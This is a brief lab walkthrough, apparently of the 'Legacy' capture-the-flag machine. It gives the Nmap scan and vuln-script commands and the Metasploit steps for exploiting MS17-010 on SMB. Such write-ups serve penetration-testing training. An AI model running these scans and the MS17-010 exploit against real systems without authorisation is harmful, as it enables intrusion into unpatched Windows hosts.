Legacy


Port Scanning and General Enumeration (Nmap)

My initial all-ports scan showed 139, 445 and 3389 open. So I targeted those in my targeted scan.

nmap -p 139,445,3389 -oN targeted -Pn -T4 -A 10.10.10.4


I also ran a script scan using the --script=vuln switch.

nmap -Pn 10.10.10.4 -p 139,445 --script=vuln


Interesting…


Access (Metasploit, ms17-010)

Let’s follow up on the MS17-010 lead from Nmap using Metasploit.

msfconsole
search ms17-010


Set your options:

set rhosts 10.10.10.4
set lhost tun0

Fire!


That was easy. Capture the flags.
